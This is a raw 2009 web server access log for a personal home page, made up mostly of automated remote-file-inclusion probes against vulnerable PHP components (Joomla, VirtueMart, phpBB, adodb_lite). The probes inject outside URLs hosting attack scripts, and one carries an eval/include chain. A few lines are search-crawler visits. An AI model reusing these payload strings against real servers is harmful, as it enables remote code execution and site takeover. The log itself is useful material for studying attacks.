110.45.144.107 - - [24/Jun/2009:09:23:04 -0700] "GET /~t290/logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 363 /home/users/t/t290/public_html/logs//administrator "-" "libwww-perl/5.79" 0 web.hypersurf.com
211.206.120.187 - - [24/Jun/2009:09:23:39 -0700] "GET /~t290///?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 200 904 /home/users/t/t290/public_html/ "-" "Mozilla/5.0" 0 web.hypersurf.com
211.206.120.187 - - [24/Jun/2009:09:23:39 -0700] "GET /~t290/logs/access.log.0///?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 306 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
211.206.120.187 - - [24/Jun/2009:09:23:40 -0700] "GET /~t290/logs///?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 200 12399 /home/users/t/t290/public_html/logs/ "-" "Mozilla/5.0" 0 web.hypersurf.com
66.11.230.36 - - [24/Jun/2009:09:29:33 -0700] "GET /~t290/logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.hppwed.com/bbs/FCKeditor/editor/js/id.txt? HTTP/1.1" 404 301 /home/users/t/t290/public_html/logs//index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
66.11.230.36 - - [24/Jun/2009:09:29:33 -0700] "GET /~t290/logs/access.log.0%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.hppwed.com/bbs/FCKeditor/editor/js/id.txt? HTTP/1.1" 404 316 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
66.11.230.36 - - [24/Jun/2009:09:29:33 -0700] "GET /~t290//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.hppwed.com/bbs/FCKeditor/editor/js/id.txt? HTTP/1.1" 404 296 /home/users/t/t290/public_html/index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
66.11.230.36 - - [24/Jun/2009:09:37:33 -0700] "GET /~t290/logs/access.log.0//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.hppwed.com/bbs/FCKeditor/editor/js/id.txt? HTTP/1.1" 404 314 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
65.254.216.47 - - [24/Jun/2009:09:46:39 -0700] "GET /~t290/logs/access.log.0%20%20///?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 308 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
65.254.216.47 - - [24/Jun/2009:09:46:39 -0700] "GET /~t290///?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 904 /home/users/t/t290/public_html/ "-" "Mozilla/5.0" 0 web.hypersurf.com
65.254.216.47 - - [24/Jun/2009:09:46:39 -0700] "GET /~t290/logs///?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 12399 /home/users/t/t290/public_html/logs/ "-" "Mozilla/5.0" 0 web.hypersurf.com
69.237.82.158 - - [24/Jun/2009:09:52:19 -0700] "GET /~t290/logs/access.log.0///vwar/backup/errors.php?error=http://www.kyouikusaikou.net/blog_student/include/redame.txt?? HTTP/1.1" 404 328 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.814" 0 web.hypersurf.com
69.237.82.158 - - [24/Jun/2009:09:52:20 -0700] "GET /~t290/logs///vwar/backup/errors.php?error=http://www.kyouikusaikou.net/blog_student/include/redame.txt?? HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs///vwar "-" "libwww-perl/5.814" 0 web.hypersurf.com
211.206.120.187 - - [24/Jun/2009:10:07:44 -0700] "GET /~t290/logs/access.log.0///?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 306 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
211.206.120.187 - - [24/Jun/2009:10:07:44 -0700] "GET /~t290/logs///?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 200 12399 /home/users/t/t290/public_html/logs/ "-" "Mozilla/5.0" 0 web.hypersurf.com
211.206.120.187 - - [24/Jun/2009:10:07:44 -0700] "GET /~t290///?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 200 904 /home/users/t/t290/public_html/ "-" "Mozilla/5.0" 0 web.hypersurf.com
124.0.139.129 - - [24/Jun/2009:10:20:39 -0700] "GET /~t290/logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://luchesk.com.ua///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 343 /home/users/t/t290/public_html/logs///administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
124.0.139.129 - - [24/Jun/2009:10:20:39 -0700] "GET /~t290/logs/access.log.0%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://luchesk.com.ua///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 358 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
124.0.139.129 - - [24/Jun/2009:10:20:39 -0700] "GET /~t290///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://luchesk.com.ua///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 338 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
66.11.230.36 - - [24/Jun/2009:10:26:49 -0700] "GET /~t290/logs/send_reminders.php?includedir=http://www.hppwed.com/bbs/FCKeditor/editor/js/id.txt? HTTP/1.1" 404 309 /home/users/t/t290/public_html/logs/send_reminders.php "-" "Mozilla/5.0" 0 web.hypersurf.com
66.11.230.36 - - [24/Jun/2009:10:26:49 -0700] "GET /~t290/logs/access.log.0/send_reminders.php?includedir=http://www.hppwed.com/bbs/FCKeditor/editor/js/id.txt? HTTP/1.1" 404 322 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
66.11.230.36 - - [24/Jun/2009:10:26:49 -0700] "GET /~t290/send_reminders.php?includedir=http://www.hppwed.com/bbs/FCKeditor/editor/js/id.txt? HTTP/1.1" 404 304 /home/users/t/t290/public_html/send_reminders.php "-" "Mozilla/5.0" 0 web.hypersurf.com
66.11.230.36 - - [24/Jun/2009:10:26:50 -0700] "GET /~t290/send_reminders.php?includedir=http://www.hppwed.com/bbs/FCKeditor/editor/js/id.txt? HTTP/1.1" 404 304 /home/users/t/t290/public_html/send_reminders.php "-" "Mozilla/5.0" 0 web.hypersurf.com
66.11.230.36 - - [24/Jun/2009:10:26:51 -0700] "GET /~t290/logs/send_reminders.php?includedir=http://www.hppwed.com/bbs/FCKeditor/editor/js/id.txt? HTTP/1.1" 404 309 /home/users/t/t290/public_html/logs/send_reminders.php "-" "Mozilla/5.0" 0 web.hypersurf.com
66.11.230.36 - - [24/Jun/2009:10:26:51 -0700] "GET /~t290/logs/access.log.0/send_reminders.php?includedir=http://www.hppwed.com/bbs/FCKeditor/editor/js/id.txt? HTTP/1.1" 404 322 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
66.11.230.36 - - [24/Jun/2009:10:27:15 -0700] "GET /~t290/logs/access.log.0%20%20/send_reminders.php?includedir=http://www.hppwed.com/bbs/FCKeditor/editor/js/id.txt? HTTP/1.1" 404 324 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
66.11.230.36 - - [24/Jun/2009:10:27:15 -0700] "GET /~t290/logs/send_reminders.php?includedir=http://www.hppwed.com/bbs/FCKeditor/editor/js/id.txt? HTTP/1.1" 404 309 /home/users/t/t290/public_html/logs/send_reminders.php "-" "Mozilla/5.0" 0 web.hypersurf.com
66.11.230.36 - - [24/Jun/2009:10:27:15 -0700] "GET /~t290/send_reminders.php?includedir=http://www.hppwed.com/bbs/FCKeditor/editor/js/id.txt? HTTP/1.1" 404 304 /home/users/t/t290/public_html/send_reminders.php "-" "Mozilla/5.0" 0 web.hypersurf.com
66.11.230.36 - - [24/Jun/2009:10:31:25 -0700] "GET /~t290/logs/send_reminders.php?includedir=http://www.hppwed.com/bbs/FCKeditor/editor/js/id.txt? HTTP/1.1" 404 309 /home/users/t/t290/public_html/logs/send_reminders.php "-" "Mozilla/5.0" 0 web.hypersurf.com
66.11.230.36 - - [24/Jun/2009:10:31:26 -0700] "GET /~t290/send_reminders.php?includedir=http://www.hppwed.com/bbs/FCKeditor/editor/js/id.txt? HTTP/1.1" 404 304 /home/users/t/t290/public_html/send_reminders.php "-" "Mozilla/5.0" 0 web.hypersurf.com
66.11.230.36 - - [24/Jun/2009:10:31:29 -0700] "GET /~t290/logs/access.log.0/send_reminders.php?includedir=http://www.hppwed.com/bbs/FCKeditor/editor/js/id.txt? HTTP/1.1" 404 322 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
124.0.139.129 - - [24/Jun/2009:10:32:01 -0700] "GET /~t290/logs/access.log.0///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://luchesk.com.ua///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 356 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
77.221.130.15 - - [24/Jun/2009:10:33:52 -0700] "GET /~t290/logs/access.log.0/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 354 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.805" 0 web.hypersurf.com
77.221.130.15 - - [24/Jun/2009:10:33:54 -0700] "GET /~t290/logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 341 /home/users/t/t290/public_html/logs/administrator "-" "libwww-perl/5.805" 0 web.hypersurf.com
72.30.79.112 - - [24/Jun/2009:10:49:53 -0700] "GET /~t290/logs/Nov02.html HTTP/1.0" 200 14631 /home/users/t/t290/public_html/logs/Nov02.html "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 web.hypersurf.com
122.153.28.140 - - [24/Jun/2009:10:53:14 -0700] "GET /~t290/logs/access.log.0/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://luchesk.com.ua///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 344 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
122.153.28.140 - - [24/Jun/2009:10:53:14 -0700] "GET /~t290/logs/access.log.0/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://luchesk.com.ua///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 344 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
122.153.28.140 - - [24/Jun/2009:10:53:15 -0700] "GET /~t290/logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://luchesk.com.ua///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 331 /home/users/t/t290/public_html/logs/lib "-" "Mozilla/5.0" 0 web.hypersurf.com
122.153.28.140 - - [24/Jun/2009:10:53:15 -0700] "GET /~t290/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://luchesk.com.ua///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 326 /home/users/t/t290/public_html/lib "-" "Mozilla/5.0" 0 web.hypersurf.com
122.153.28.140 - - [24/Jun/2009:10:53:16 -0700] "GET /~t290/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://luchesk.com.ua///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 326 /home/users/t/t290/public_html/lib "-" "Mozilla/5.0" 0 web.hypersurf.com
122.153.28.140 - - [24/Jun/2009:10:53:16 -0700] "GET /~t290/logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://luchesk.com.ua///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 331 /home/users/t/t290/public_html/logs/lib "-" "Mozilla/5.0" 0 web.hypersurf.com
122.153.28.140 - - [24/Jun/2009:10:57:02 -0700] "GET /~t290/logs/access.log.0%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://luchesk.com.ua///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 346 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
122.153.28.140 - - [24/Jun/2009:10:57:06 -0700] "GET /~t290/logs/access.log.0%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://luchesk.com.ua///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 346 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
82.194.87.219 - - [24/Jun/2009:11:05:22 -0700] "GET /~t290/logs////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 344 /home/users/t/t290/public_html/logs////components "-" "libwww-perl/5.822" 0 web.hypersurf.com
222.162.115.67 - - [24/Jun/2009:11:05:24 -0700] "GET /~t290/logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 356 /home/users/t/t290/public_html/logs//technote7 "-" "Mozilla/5.0" 0 web.hypersurf.com
222.162.115.67 - - [24/Jun/2009:11:05:24 -0700] "GET /~t290//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 351 /home/users/t/t290/public_html/technote7 "-" "Mozilla/5.0" 0 web.hypersurf.com
222.162.115.67 - - [24/Jun/2009:11:05:25 -0700] "GET /~t290/logs/access.log.0//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 369 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
222.162.115.67 - - [24/Jun/2009:11:05:28 -0700] "GET /~t290/logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 356 /home/users/t/t290/public_html/logs//technote7 "-" "Mozilla/5.0" 0 web.hypersurf.com
222.162.115.67 - - [24/Jun/2009:11:05:28 -0700] "GET /~t290//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 351 /home/users/t/t290/public_html/technote7 "-" "Mozilla/5.0" 0 web.hypersurf.com
222.162.115.67 - - [24/Jun/2009:11:05:28 -0700] "GET /~t290/logs/access.log.0//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 369 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
82.194.87.219 - - [24/Jun/2009:11:08:00 -0700] "GET /~t290/logs////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 344 /home/users/t/t290/public_html/logs////components "-" "libwww-perl/5.822" 0 web.hypersurf.com
65.55.230.229 - - [24/Jun/2009:11:10:28 -0700] "GET /~t290/twllpicts/loonlake2/source/9.htm HTTP/1.1" 200 656 /home/users/t/t290/public_html/twllpicts/loonlake2/source/9.htm "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" 0 web.hypersurf.com
65.55.230.229 - - [24/Jun/2009:11:24:20 -0700] "GET /~t290/twllpicts/loonlake2/index.htm HTTP/1.1" 200 3544 /home/users/t/t290/public_html/twllpicts/loonlake2/index.htm "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" 0 web.hypersurf.com
82.194.87.219 - - [24/Jun/2009:11:28:25 -0700] "GET /~t290/logs////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 344 /home/users/t/t290/public_html/logs////components "-" "libwww-perl/5.822" 0 web.hypersurf.com
208.111.94.201 - - [24/Jun/2009:11:42:46 -0700] "GET /~t290/logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.petitbijouonline.com/includes/lib/fatal1.txt???? HTTP/1.1" 404 346 /home/users/t/t290/public_html/logs//skin_shop "-" "Mozilla/5.0" 1 web.hypersurf.com
208.111.94.201 - - [24/Jun/2009:11:42:46 -0700] "GET /~t290//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.petitbijouonline.com/includes/lib/fatal1.txt???? HTTP/1.1" 404 341 /home/users/t/t290/public_html/skin_shop "-" "Mozilla/5.0" 1 web.hypersurf.com
208.111.94.201 - - [24/Jun/2009:11:42:52 -0700] "GET /~t290/logs/access.log.0%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.petitbijouonline.com/includes/lib/fatal1.txt???? HTTP/1.1" 404 361 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
66.249.67.116 - - [24/Jun/2009:11:45:36 -0700] "GET /~t290/twllpicts/loonlake1/source/23.htm HTTP/1.1" 200 652 /home/users/t/t290/public_html/twllpicts/loonlake1/source/23.htm "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 web.hypersurf.com
208.111.94.201 - - [24/Jun/2009:12:10:09 -0700] "GET /~t290/logs/errors.php?error=http://www.petitbijouonline.com/includes/lib/fatal1.txt???? HTTP/1.1" 404 301 /home/users/t/t290/public_html/logs/errors.php "-" "Mozilla/5.0" 0 web.hypersurf.com
208.111.94.201 - - [24/Jun/2009:12:10:09 -0700] "GET /~t290/logs/access.log.0%20%20/errors.php?error=http://www.petitbijouonline.com/includes/lib/fatal1.txt???? HTTP/1.1" 404 316 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
208.111.94.201 - - [24/Jun/2009:12:10:32 -0700] "GET /~t290/errors.php?error=http://www.petitbijouonline.com/includes/lib/fatal1.txt???? HTTP/1.1" 404 296 /home/users/t/t290/public_html/errors.php "-" "Mozilla/5.0" 0 web.hypersurf.com
217.147.29.190 - - [24/Jun/2009:12:19:20 -0700] "GET /~t290//twindow_notice.php?shop_this_skin_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 305 /home/users/t/t290/public_html/twindow_notice.php "-" "Mozilla/5.0" 0 web.hypersurf.com
217.147.29.190 - - [24/Jun/2009:12:19:20 -0700] "GET /~t290/logs//twindow_notice.php?shop_this_skin_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 310 /home/users/t/t290/public_html/logs//twindow_notice.php "-" "Mozilla/5.0" 0 web.hypersurf.com
217.147.29.190 - - [24/Jun/2009:12:19:22 -0700] "GET /~t290/logs/access.log.0//twindow_notice.php?shop_this_skin_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 323 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
208.111.94.201 - - [24/Jun/2009:12:20:01 -0700] "GET /~t290/logs/access.log.0//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.petitbijouonline.com/includes/lib/fatal1.txt???? HTTP/1.1" 404 359 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
217.147.29.190 - - [24/Jun/2009:12:22:17 -0700] "GET /~t290/logs/access.log.0%20%20//twindow_notice.php?shop_this_skin_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 325 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
208.111.94.201 - - [24/Jun/2009:12:31:36 -0700] "GET /~t290/logs/access.log.0/errors.php?error=http://www.petitbijouonline.com/includes/lib/fatal1.txt???? HTTP/1.1" 404 314 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
72.30.79.112 - - [24/Jun/2009:12:44:06 -0700] "GET /~t290/logs/stats-2003/Jan.wwwstats.html.gz HTTP/1.0" 404 310 /home/users/t/t290/public_html/logs/stats-2003 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 web.hypersurf.com
89.186.1.54 - - [24/Jun/2009:12:44:37 -0700] "GET /~t290/logs/access.log.0//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 352 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.800" 0 web.hypersurf.com
89.186.1.54 - - [24/Jun/2009:12:44:37 -0700] "GET /~t290/logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 339 /home/users/t/t290/public_html/logs//skin_shop "-" "libwww-perl/5.800" 0 web.hypersurf.com
89.186.1.54 - - [24/Jun/2009:12:52:34 -0700] "GET /~t290/logs/access.log.0//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 352 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.800" 0 web.hypersurf.com
89.186.1.54 - - [24/Jun/2009:12:52:34 -0700] "GET /~t290/logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 339 /home/users/t/t290/public_html/logs//skin_shop "-" "libwww-perl/5.800" 0 web.hypersurf.com
125.140.142.39 - - [24/Jun/2009:13:20:06 -0700] "GET /~t290/logs/access.log.0/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://rox-crime.no-ip.org:8080/mic22.txt?? HTTP/1.1" 404 363 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.65" 0 web.hypersurf.com
125.140.142.39 - - [24/Jun/2009:13:20:07 -0700] "GET /~t290/logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://rox-crime.no-ip.org:8080/mic22.txt?? HTTP/1.1" 404 350 /home/users/t/t290/public_html/logs/administrator "-" "libwww-perl/5.65" 0 web.hypersurf.com
80.77.37.118 - - [24/Jun/2009:13:29:08 -0700] "GET /~t290/logs/access.log.0/errors.php?error=http://www.graal-plus.zp.ua//images/rox.jpg?? HTTP/1.1" 404 314 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.803" 0 web.hypersurf.com
80.77.37.118 - - [24/Jun/2009:13:29:09 -0700] "GET /~t290/logs/errors.php?error=http://www.graal-plus.zp.ua//images/rox.jpg?? HTTP/1.1" 404 301 /home/users/t/t290/public_html/logs/errors.php "-" "libwww-perl/5.803" 0 web.hypersurf.com
72.30.79.112 - - [24/Jun/2009:13:59:59 -0700] "GET /~t290/twllpicts/island/source/ HTTP/1.0" 200 3063 /home/users/t/t290/public_html/twllpicts/island/source/ "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 web.hypersurf.com
121.165.73.157 - - [24/Jun/2009:14:43:11 -0700] "GET /~t290/logs/access.log.0%20%20//html/index.php?phpbb_root_path=http://www.bsrd.or.kr/bbs/skin/zero_vote/uiu.txt? HTTP/1.1" 404 321 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
121.165.73.157 - - [24/Jun/2009:14:43:11 -0700] "GET /~t290/logs//html/index.php?phpbb_root_path=http://www.bsrd.or.kr/bbs/skin/zero_vote/uiu.txt? HTTP/1.1" 404 306 /home/users/t/t290/public_html/logs//html "-" "Mozilla/5.0" 0 web.hypersurf.com
121.165.73.157 - - [24/Jun/2009:14:43:14 -0700] "GET /~t290//html/index.php?phpbb_root_path=http://www.bsrd.or.kr/bbs/skin/zero_vote/uiu.txt? HTTP/1.1" 404 301 /home/users/t/t290/public_html/html "-" "Mozilla/5.0" 0 web.hypersurf.com
220.79.47.122 - - [24/Jun/2009:14:59:25 -0700] "GET /~t290/logs//html/index.php?phpbb_root_path=http://www.bsrd.or.kr/bbs/skin/zero_vote/uiu.txt? HTTP/1.1" 404 306 /home/users/t/t290/public_html/logs//html "-" "Mozilla/5.0" 0 web.hypersurf.com
220.79.47.122 - - [24/Jun/2009:14:59:25 -0700] "GET /~t290//html/index.php?phpbb_root_path=http://www.bsrd.or.kr/bbs/skin/zero_vote/uiu.txt? HTTP/1.1" 404 301 /home/users/t/t290/public_html/html "-" "Mozilla/5.0" 0 web.hypersurf.com
220.79.47.122 - - [24/Jun/2009:14:59:25 -0700] "GET /~t290/logs/access.log.0//html/index.php?phpbb_root_path=http://www.bsrd.or.kr/bbs/skin/zero_vote/uiu.txt? HTTP/1.1" 404 319 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
